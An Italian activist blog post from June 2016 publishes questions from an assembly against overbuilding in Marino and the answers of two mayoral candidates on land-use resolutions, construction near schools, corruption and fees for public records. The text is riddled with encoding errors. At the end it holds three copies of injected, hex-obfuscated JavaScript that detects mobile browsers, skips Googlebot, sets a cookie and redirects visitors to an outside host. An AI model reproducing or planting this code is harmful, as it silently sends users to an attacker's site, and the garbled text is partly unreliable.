Monthly Archives: Giugno 2016

Risposte dei candidati sindaco Eleonora di Giulio e Carlo Colizza

AGGIORNAMENTO: DOPO AVER INVIATO LE DOMANDE AI DUE CANDIDATI SINDACO, ABBIAMO DA POCO RICEVUTO LE LORO RISPOSTE CHE PUBBLICHIAMO DI SEGUITO RIPORTANDOLE IN CORSIVO

—————————————————————————————————————————–

Sono state da poco inoltrate alla Di Giulio(centro-sinistra) e a Colizza(M5S) le domande che trovate di seguito, cosAi?? come deciso lunedAi?? scorso in assemblea.
Pubblicheremo le risposte non appena le riceveremo (o le leggeremo su qualche sito).
Per conoscenza, le stesse domande sono state spedite anche ai locali organi di stampa.
L’intento A? quello di esplicitare ancor di piA? gli atti pratici che ciascuno dei due vorrAi?? intenderAi?? realizzare una volta eletto/a.
—————————————————————————————————————————–

L’Assemblea contro la Cementificazione del Comune di Marino intende rivolgere agli aspiranti sindaco, Carlo Colizza ed Eleonora di Giulio, e ai partiti/movimenti di cui sono espressione sul territorio alcune domande inerenti le questioni dell’opposizione alla devastazione di circa 160 ettari di Agro Romano per un totale di 12.500 nuovi abitanti, cosAi?? come previsto nel ai???Masterplanai??? approvato con le delibere comunali del 3 agosto 2011.

In questo periodo elettorale abbiamo letto molte dichiarazioni, di ambo gli schieramenti, e crediamo ai??i?? per non lasciare spazio alle interpretazioni ai??i?? sia giusto chiedervi come intendete proseguire la vertenza contro i progetti di cui sopra, sia se vi troverete tra i banchi della maggioranza, sia se sarete tra quelli dell’opposizione.

Infatti,negli anni precedenti siete riusciti a collaborare ai??i?? eravate nel M5S, nel Movimento per il Cambiamento e nell’Unione di Centro Sinistra ai??i?? proprio sull’opposizione ai progetti speculativi riguardanti il raddoppio dei centri abitati di S.Maria delle Mole e Frattocchie.

PREMESSA NAi??1

Il 27 novembre 2014 avete richiesto in Consiglio Comunale l’annullamento in autotutela delle delibere del 3 agosto 2011 e seguenti, riguardanti la cementificazione di via del Divino Amore, Mazzamagna e Mugilla. Il Consiglio Comunale si protrasse fino oltre l’una di notte con il chiaro intento, non riuscito, di far allontanare le decine di persone che erano intervenute per sostenere questa importante richiesta. Ricordiamo i diversi ricorsi pendenti al TAR proprio contro quelle delibere comunali (e gli altri sulle delibere regionali) perchAi?? del tutto illegittime.

DOMANDA NAi??1

Annullerete/revocherete quelle delibere ed i successivi atti amministrativi ad esse collegati una volta che ne avrete il potere e, quindi, la possibilitAi?? ?

DI GIULIO: Due specifiche. Uno: la logica del “potere” non mi appartiene nAi?? mai mi apparterrAi??. Ecco perchAi?? tutte le mie battaglie sono state fatte – ampiamente documentabile – nella logica della correttezza amministrativa, nel rispetto delle leggi e nell’ottica dell’attenzione al territorio. Due. La possibilitAi??, in qualitAi?? di Sindaco di Marino, di visionare tutti gli atti e i documenti relativi alla questione in oggetto, garantisce – e lo ribadisco anche in questo caso – il rispetto dei cardini del mio mandato: misurabilitAi??, concretezza e condivisione. In base a quello che troveremo nelle carte (e sono centinaia) presenti a Palazzo Colonna e relative alla questione prenderemo le decisioni da prendere, sempre tese alla tutela del territorio e non del suo ulteriore consumo scriteriato. Ci batteremo, anche dopo, sempre nel rispetto di leggi e norme, per arrivare alla soluzione migliore per la collettivitAi??, per lai??i??Ente Comune e per ambiente e territorio.

COLIZZA: Possiamo dare una risposta semplice ed una piA? articolata.
Quella semplice: Confermiamo che fermeremo la speculazione del Divino Amore senza procedere mai ad alcuna ai???rivisitazioneai??? e senza alcun costo per i cittadini di Marino.

Quella piA? articolata:
Conosciamo bene i contenuti della mozione richiamata in premessa. Lai??i??abbiamo scritta noi e poi abbiamo chiesto la firma del piA? ampio schieramento possibile. Solo il PD non firmA? quella mozione. Ma conosciamo bene anche i contenuti della mozione firmata a Giugno 2015 dal Consigliere Tammaro, quelli della interrogazione sulla questione Acqua del Novembre 2012, quelli della mozione del Settembre 2013, quelli della interrogazione del 16 Marzo 2015 (scarichi Mugilla e indagini su Co2). Conosciamo ed abbiamo condiviso ed archiviato tutti i documenti della vicenda perchAi?? anche a livello del M5S Regionale abbiamo lavorato a fondo per bloccare quella speculazione. Mentre noi lavoravamo per bloccare tutto il PD a livello Regionale ed a livello di Marino non faceva nulla.
Se i Cittadini sceglieranno il M5S, appena insediata la nuova Giunta non solo riprenderAi?? tali mozioni e punto per punto verificherAi?? la situazione degli atti amministrativi ma convocheremo immediatamente una conferenza di servizi (cosAi?? come previsto dalla delibera 35 del 3 agosto 2011 e mai convocata) con tutti gli Enti interessati (Regione, CittAi?? Metropolitana, ASL, ACEA, Parco Appia Antica, varie soprintendenze interessate, chiamando anche Comitati e portatori di interessi). Inoltre avvieremo immediatamente lai??i??iter per una variante generale che recepisca a livello di Piano Regolatore le prescrizioni del Piano Territoriale Provinciale Generale il cui mancato rispetto A? stato oggetto del ricorso al TAR da parte della CittAi?? Metropolitana contro la Regione Lazio e contro il Comune di Marino.

PREMESSA NAi??2

Sono partiti i cantieri in zona Mugilla, che prevedono 400 abitanti in 17 nuovi palazzi a ridosso delle scuole ai???G.Verdiai??? e ai???B.Ciariai???. Per quattro degli otto palazzi di cui finora si conoscono con certezza gli atti relativi ai permessi a costruire, non sono state prodotte le necessarie relazioni sui rilevamenti di CO2, cosAi?? come previsto dalla normativa regionale. Lo scorso anno un’aula del plesso della ai???Verdiai??? A? stata evacuata poco dopo i primi scavi per i sondaggi archeologici. Quegli ettari, contigui al Parco dell’Appia Antica, andranno definitivamente persi e stanno creando preoccupazione tra i genitori, il personale scolastico e gli alunni delle due scuole.

DOMANDA NAi??2

I candidati sindaco hanno avuto modo di effettuare un sopralluogo per accertarsi dello scempio che si sta perpetrando? Quali interventi urgenti pensate di attuare per fermare i cantieri di ai???La Mole 2ai??? e ai???Cristina s.r.l.ai??? ?

DI GIULIO: Sono stata sul posto, si. La politica, quella vera intendo, si fa con atti amministrativi legali e legittimi. Ripeto: le carte che troverA? a Palazzo Colonna mi daranno la dimensione reale dello status quo a fronte del quale si potrAi?? impostare una seria attivitAi?? amministrativa, coerente e finalizzata alla tutela del territorio, della salute e, quindi, dei cittadini tutti. Per agire avrA?, avremo, necessariamente bisogno di valutare la situazione esistente sia dal punto di vista amministrativo, che legale. E lo faremo.

COLIZZA:Ai?? Quello che sta succedendo a Mugilla lo conosciamo bene. Eai??i?? uno scempio, siamo perfettamente dai??i??accordo. Non solo si sta distruggendo un territorio prezioso ma lo sta facendo anche male, costringendo i ragazzi della scuola a sostituire con un muro di cemento lo spazio verde precedente. Dal punto di vista amministrativo vale quanto indicato alla risposta precedente. Riteniamo che tutta la lottizzazione vada fermata con urgenza.

PREMESSA NAi??3

Sono numerosi e acclarati i casi di corruzione legati al rilascio di permessi a costruire, A? evidente lo scempio urbanistico attuale che si nota girando in ogni angolo del comune, sono molti i procedimenti penali che coinvolgono il massimo dirigente, ing. Stefano Petrini, e altri dipendenti degli uffici limitrofi al suo.

DOMANDA NAi??3

Quali provvedimenti concreti prenderete nei confronti dell’ing. Petrini e degli altri dipendenti? Saranno tutti sostituiti o continueranno a lavorare come hanno fatto in questi anni ?

DI GIULIO: Mi sembra una domanda da caccia alle streghe. Io mi occupo di atti amministrativi corretti e legali, la magistratura, a fronte di irregolaritAi??, farAi?? il suo. L’amministrazione pubblica non A? un terno al lotto, da dove estrarre i buoni e lasciar cadere i cattivi. Anche perchAi??, come saprAi??, c’A? un coordinamento a piA? voci. Tra queste ci sono i sindacati. Anche le sostituzioni vanno eseguite rispettando le leggi. E le condizioni contrattuali sottoscritte. La differenza tra un “tempo determinato” e un “tempo indeterminato”, per esempio. Anche in questo caso bisognerAi?? valutare la situazione esistente e prendere decisioni che tutelino per prima cosa la collettivitAi??. Esamineremo con attenzione, leggi e norme alla mano, questo A? chiaro, quanto prodotto (e come) negli anni. Poi sapremo prendere decisioni nella massima trasparenza.

COLIZZA: Se i cittadini di Marino daranno al M5S il compito di amministrare Marino sarAi?? il segno che esiste una chiara volontAi?? di cambiare pagina. Questo ci consentirAi?? di andare a fondo e agire per il ripristino della legalitAi??. Intendiamo inoltre aprire una fattiva collaborazione con tutti quegli organi dello Stato che stanno indagando per agevolare il loro lavoro e fare in modo che possa terminare prima possibile.

PREMESSA NAi??4

Il Commissario Prefettizio, dott.ssa Enza Caporale, lo scorso 15 marzo 2016, con la Deliberazione NAi??21, ha imposto il pagamento di tariffe (finora non dovute) per ottenere gli atti amministrativi. E’ stata particolarmente attenta a bastonare le richieste di atti riguardanti le pratiche edilizie: dai 70 ai 100 euro. In questi anni, se si A? riusciti ad esercitare un certo controllo e far emergere diverse problematiche A? stato proprio grazie al libero accesso a determinati atti, seppur spesso ci si A? imbattuti in ai???ritardiai??? e in qualche ai???diniegoai???.

DOMANDA NAi??4

Chi vincerAi?? il ballottaggio revocherAi?? questa deliberazione che frena il libero accesso agli atti amministrativi ponendo ad oggi il singolo cittadino davanti ad un esborso economico per i cosiddetti ai???diritti di ricercaai??? che riteniamo assolutamente non dovuto , dato che si tratta di un normale servizio di un dipendente pubblico ?

Per ora, crediamo che queste domande siano chiare e sufficienti. Speriamo che le vostre risposte lo saranno altrettanto e, da parte nostra, riteniamo la revoca/annullamento delle delibere del 3 agosto 2011 non un punto di arrivo, ma un fondamentale passaggio che non esaurirAi?? comunque la necessitAi?? di continuare ad opporsi agli appetiti dei politici e degli imprenditori che vogliono continuare a imporre i loro interessi contro quelli della collettivitAi??.

Le risposte che ci perverranno saranno rese pubbliche, a beneficio di tutti/e.

Assemblea contro la Cementificazione — stopcemento@inventati.org — http://stopcemento.noblogs.org

DI GIULIO: In questo caso, sempre premettendo un attento esame sia delle norme che delle leggi, ma anche degli atti deliberati dal Commissario, ritengo sia necessario evitare di aumentare impropriamente i costi per ogni tipo di accesso agli atti della Pubblica Amministrazione. Il cittadino deve essere favorito nella sua partecipazione alle scelte. E lai??i??accesso agli atti A? uno dei primi passi in questo senso.

COLIZZA: Da pochissimi giorni (16 Maggio 2016) il Governo ha emanato nuove norme per quanto riguarda lai??i??accesso agli atti ed ai dati pubblici (denominato FOIA ai??i?? Freedom of information act). Dobbiamo ancora nel dettaglio vedere il testo del DPCM ma sembra acclarato che la consegna digitale non darAi?? luogo ad alcun costo per il richiedente. SarAi?? nostra cura adottare immediatamente le modifiche strutturali necessarie per rendere il rispetto di tale nuova normativa immediato ed a basso impatto di lavoro per gli uffici tramite una riorganizzazione dellai??i??archiviazione dei documenti.

Ai??var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}